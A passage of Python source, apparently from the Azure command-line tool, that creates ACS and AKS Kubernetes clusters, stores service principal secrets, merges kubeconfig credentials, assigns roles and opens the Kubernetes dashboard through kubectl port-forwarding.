if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value):
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# if api-version is not specified, or specified in a version not supported
# override based on location
if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]:
if location in regions_in_preview:
api_version = "2017-07-01" # 2017-07-01 supported in the preview locations
else:
api_version = "2017-01-31" # 2017-01-31 applied to other locations
if orchestrator_type.lower() == 'kubernetes':
principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id,
dns_name_prefix, location, name)
client_secret = principal_obj.get("client_secret")
service_principal = principal_obj.get("service_principal")
elif windows:
raise CLIError('--windows is only supported for Kubernetes clusters')
# set location if void
if not location:
location = '[resourceGroup().location]'
# set os_type
os_type = 'Linux'
if windows:
os_type = 'Windows'
# set agent_ports if void
if not agent_ports:
agent_ports = []
# get windows_profile
windows_profile = _generate_windows_profile(windows, admin_username, admin_password)
# The resources.properties fields should match with ContainerServices' api model
master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile)
agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile)
outputs = _generate_outputs(name, orchestrator_type, admin_username)
properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile)
resource = {
"apiVersion": api_version,
"location": location,
"type": "Microsoft.ContainerService/containerServices",
"name": name,
"tags": tags,
"properties": properties,
}
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"resources": [
resource,
],
"outputs": outputs,
}
params = {}
if service_principal is not None and client_secret is not None:
properties["servicePrincipalProfile"] = {
"clientId": service_principal,
"secret": "[parameters('clientSecret')]",
}
template["parameters"] = {
"clientSecret": {
"type": "secureString",
"metadata": {
"description": "The client secret for the service principal"
}
}
}
params = {
"clientSecret": {
"value": client_secret
}
}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return _invoke_deployment(cmd.cli_ctx, resource_group_name, deployment_name,
template, params, validate, no_wait)
except CloudError as ex:
retry_exception = ex
if 'is not valid according to the validation procedure' in ex.message or \
'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cli_ctx, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.cli.core.profiles import ResourceType, get_sdk
DeploymentProperties = get_sdk(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES, 'DeploymentProperties', mod='models')
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
return smc.validate(resource_group_name, deployment_name, properties)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)
def k8s_get_credentials(cmd, client, name, resource_group_name,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
ssh_key_file=None,
overwrite_existing=False):
"""Download and install kubectl credentials from the cluster master
:param name: The name of the cluster.
:type name: str
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param path: Where to install the kubectl config file
:type path: str
:param ssh_key_file: Path to an SSH key file to use
:type ssh_key_file: str
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing)
def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing):
if ssh_key_file is not None and not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member
location = acs_info.location # pylint: disable=no-member
user = acs_info.linux_profile.admin_username # pylint: disable=no-member
_mkdir_p(os.path.dirname(path))
path_candidate = path
ix = 0
while os.path.exists(path_candidate):
ix += 1
path_candidate = '{}-{}-{}'.format(path, name, ix)
# TODO: this only works for public cloud, need other casing for national clouds
acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location),
'.kube/config', path_candidate, key_filename=ssh_key_file)
# merge things
if path_candidate != path:
try:
merge_kubernetes_configurations(path, path_candidate, overwrite_existing)
except yaml.YAMLError as exc:
logger.warning('Failed to merge credentials to kube config file: %s', exc)
logger.warning('The credentials have been saved to %s', path_candidate)
def _handle_merge(existing, addition, key, replace):
if not addition.get(key, False):
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if not i.get('name', False) or not j.get('name', False):
continue
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
from knack.prompting import prompt_y_n, NoTTYException
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
raise
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError('failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
print(msg)
def _get_host_name(acs_info):
"""
Gets the FQDN from the acs_info object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info is None:
raise CLIError('Missing acs_info')
if acs_info.master_profile is None:
raise CLIError('Missing master_profile')
if acs_info.master_profile.fqdn is None:
raise CLIError('Missing fqdn')
return acs_info.master_profile.fqdn
def _get_username(acs_info):
"""
Gets the admin user name from the Linux profile of the ContainerService object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info.linux_profile is not None:
return acs_info.linux_profile.admin_username
return None
def _get_acs_info(cli_ctx, name, resource_group_name):
"""
Gets the ContainerService object from Azure REST API.
:param name: ACS resource name
:type name: String
:param resource_group_name: Resource group name
:type resource_group_name: String
"""
container_services = cf_container_services(cli_ctx, None)
return container_services.get(resource_group_name, name)
def _rand_str(n):
"""
Gets a random string
"""
choices = string.ascii_lowercase + string.digits
return ''.join(random.SystemRandom().choice(choices) for _ in range(n))
def _mkdir_p(path):
# http://stackoverflow.com/a/600612
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
instance = client.get(resource_group_name, container_service_name)
instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member
# null out the service principal because otherwise validation complains
if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes:
instance.service_principal_profile = None
# null out the windows profile so that validation doesn't complain about not having the admin password
instance.windows_profile = None
return client.create_or_update(resource_group_name, container_service_name, instance)
def list_container_services(cmd, client, resource_group_name=None):
''' List Container Services. '''
svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return list(svc_list)
def show_service_principal(client, identifier):
object_id = _resolve_service_principal(client, identifier)
return client.get(object_id)
def _resolve_service_principal(client, identifier):
# todo: confirm with graph team that a service principal name must be unique
result = list(client.list(filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier)))
if result:
return result[0].object_id
try:
uuid.UUID(identifier)
return identifier # assume an object id
except ValueError:
raise CLIError("service principal '{}' doesn't exist".format(identifier))
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds,
required_resource_access=required_resource_accesses)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def update_application(client, object_id, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
try:
if key_creds:
client.update_key_credentials(object_id, key_creds)
if password_creds:
client.update_password_credentials(object_id, password_creds)
if reply_urls:
client.patch(object_id, ApplicationUpdateParameters(reply_urls=reply_urls))
return
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError('specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = dateutil.parser.parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = dateutil.parser.parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx, role, assignee, resource_group_name, scope)
def _create_role_assignment(cli_ctx, role, assignee, resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError("No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
# pylint: disable=too-many-statements
def aks_browse(cmd, client, resource_group_name, name, disable_browser=False,
listen_address='127.0.0.1', listen_port='8001'):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
addon_profile = addon_profiles.get("kubeDashboard", ManagedClusterAddonProfile(enabled=True))
if not addon_profile.enabled:
raise CLIError('The kube-dashboard addon was disabled for this managed cluster.\n'
'To use "az aks browse" first enable the add-on\n'
'by running "az aks enable-addons --addons kube-dashboard".')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
)
# output format: b"'{port}'"
dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard port: {}'.format(err))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = '{0}://{1}:{2}/'.format(protocol, listen_address, listen_port)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{}'.format(term_id),
json={"url": result['url']})
logger.warning('To view the console, please open %s in a new tab', result['url'])
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(proxy_url)
try:
try:
subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "--namespace", "kube-system",
"port-forward", "--address", listen_address, dashboard_pod,
"{0}:{1}".format(listen_port, dashboard_port)], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
if err.output.find(b'unknown flag: --address'):
if listen_address != '127.0.0.1':
logger.warning('"--address" is only supported in kubectl v1.13 and later.')
logger.warning('The "--listen-address" argument will be ignored.')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "--namespace", "kube-system",
"port-forward", dashboard_pod, "{0}:{1}".format(listen_port, dashboard_port)])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
requests.post('http://localhost:8888/closeport/8001')
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _validate_ssh_key(no_ssh_key, ssh_key_value):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
# pylint: disable=too-many-statements,too-many-branches
def aks_create(cmd, client, resource_group_name, name, ssh_key_value, # pylint: disable=too-many-locals
dns_name_prefix=None,
location=None,
admin_username="azureuser",
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_size=0,
node_count=3,
nodepool_name="nodepool1",
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
enable_cluster_autoscaler=False,
network_plugin=None,
network_policy=None,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
enable_addons=None,
workspace_resource_id=None,
vnet_subnet_id=None,
max_pods=0,
min_count=None,
max_count=None,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
zones=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
api_server_authorized_ip_ranges=None,
attach_acr=None,
no_wait=False):
_validate_ssh_key(no_ssh_key, ssh_key_value)
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = _set_load_balancer_sku(load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError('--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
availability_zones=zones,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"),
key_vault_secret_ref=None)
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
scope = vnet_subnet_id
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
service_principal_profile.client_id, scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = _get_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes)
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
network_profile = None
if any([network_plugin, pod_cidr, service_cidr, dns_service_ip, docker_bridge_address, network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError('Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id
)
monitoring = False
if 'omsagent' in addon_profiles:
monitoring = True
_ensure_container_insights_for_monitoring(cmd, addon_profiles['omsagent'])
aad_profile = None
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]):
if aad_tenant_id is None:
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
api_server_access_profile = None
if api_server_authorized_ip_ranges:
api_server_access_profile = _populate_api_server_access_profile(api_server_authorized_ip_ranges)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')
mc = ManagedCluster(
location=location,
tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=not disable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
api_server_access_profile=api_server_access_profile
)
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
result = sdk_no_wait(no_wait,
client.create_or_update,
resource_group_name=resource_group_name,
resource_name=name, parameters=mc)
# add cluster spn with Monitoring Metrics Publisher role assignment to the cluster resource
# mdm metrics supported only in azure public cloud so add the role assignment only in this cloud
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurecloud' and monitoring:
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_profile.client_id, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for monitoring addon. '
'Are you an Owner on this subscription?')
return result
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
service_principal_client_id = instance.service_principal_profile.client_id
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable=True,
workspace_resource_id=workspace_resource_id, subnet_name=subnet_name, no_wait=no_wait)
if 'omsagent' in instance.addon_profiles:
_ensure_container_insights_for_monitoring(cmd, instance.addon_profiles['omsagent'])
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_client_id, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_get_versions(cmd, client, location):
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
overwrite_existing=False, context_name=None):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(resource_group_name, name)
else:
credentialResults = client.list_cluster_user_credentials(resource_group_name, name)
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8')
_print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
ADDONS = {
'http_application_routing': 'httpApplicationRouting',
'monitoring': 'omsagent',
'virtual-node': 'aciConnector',
'kube-dashboard': 'kubeDashboard'
}
def aks_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_nulls(list(managed_clusters))
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def aks_update_credentials(cmd, client, resource_group_name, name,
reset_service_principal=False,
reset_aad=False,
service_principal=None,
client_secret=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_client_app_id=None,
aad_tenant_id=None,
no_wait=False):
if bool(reset_service_principal) == bool(reset_aad):
raise CLIError('usage error: --reset-service-principal | --reset-aad-profile')
if reset_service_principal:
if service_principal is None or client_secret is None:
raise CLIError('usage error: --reset-service-principal --service-principal ID --client-secret SECRET')
return sdk_no_wait(no_wait,
client.reset_service_principal_profile,
resource_group_name,
name, service_principal, client_secret)
if not all([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
